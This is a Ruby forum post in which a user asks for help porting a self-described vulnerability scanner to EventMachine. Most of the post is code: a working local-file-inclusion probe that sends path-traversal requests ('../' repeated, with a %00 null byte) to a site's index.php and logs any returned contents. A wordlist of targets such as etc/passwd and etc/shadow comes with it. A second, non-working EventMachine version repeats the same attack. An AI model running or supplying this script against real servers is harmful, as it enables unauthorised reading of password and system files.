im working on a vulnerability scanner, basically a http client... i have
a working script that only uses 'socket' but if i was using eventmachine
i would get better performance...

[working-script]
require 'socket'
my_file = File.new("log.txt", 'w')
html = File.new("log.html","w")
 IO.foreach("list.lfi") do |block|
host = 'www.i8igmac.com'     # The web server
port = 80                           # Default HTTP port
dir = "../"
mply=0
while mply < 10
# This is the HTTP request we send to fetch a file
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n"
socket = TCPSocket.open(host,port)  # Connect to server
socket.print(request+"Host: "+host+"\r\n\r\n")               # Send
request
response = socket.read              # Read complete response
# Split response at first blank line into headers and body
headers,body = response.split("\r\n\r\n", 2)
print request
#print body                          # And display it
check=body.scan("error")

mply=mply+1

if check.to_s == "error"
  print 'no inclusion'
else
  print 'Please notify site owner of exploit\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")

end
end
end
[working-script-end]


[list.lfi-----]
etc/passwd
etc/shadow
etc/cgi-bin
etc/group
etc/security/group
[end.list-----]

this script reads each line from the list then sends out a GET request,
if a config file is found viewable to the public then this will be
logged...

this script does not handle any kind of protocal, its more of a crude
ruff draft... if i could get eventmachine to handle the protocall
performance would increase and script wouldnt crash...

here is my attempt to use eventmachine...

[em-code]
require 'rubygems'
require 'eventmachine'
my_file = File.new("log.txt", 'w')
html = File.new("out.htm","w")
 IO.foreach("list.lfi") do |block|
lfihost = 'www.i8igmac.com'     # The web server
port = 80                           # Default HTTP port
dir = "../"
mply=0
while mply < 10
request = "GET /index.php?path=#{dir*mply}#{block.chomp}%00
HTTP/1.1\r\n"


 module DumbHttpClient
   def post_init
     print request
     send_data request
     @data = ""
     @parsed = false
   end

   def receive_data data
     @data << data
     headers,body = data.split("\r\n\r\n", 2)
     print data
     EventMachine::stop_event_loop
   end

 end
 EventMachine::run {
   EventMachine::connect "www.i8igmac.com", 80, DumbHttpClient
 }
 puts "The event loop has ended"



print request
#print body                          # And display it
check=body.scan("error")
mply=mply+1
if check.to_s == "error"
  print 'no inclusion'
else
  print 'FOUND ONE\n'+request
my_file.puts request
html.puts request
html.puts body.tr("www.", "www")
end
end
end
[em-end]

any one with eventmachine expearnce could give me some help... i dont
understand why strings wont exist inside the function.. clueless at this
point

-- 
Posted via http://www.ruby-forum.com/.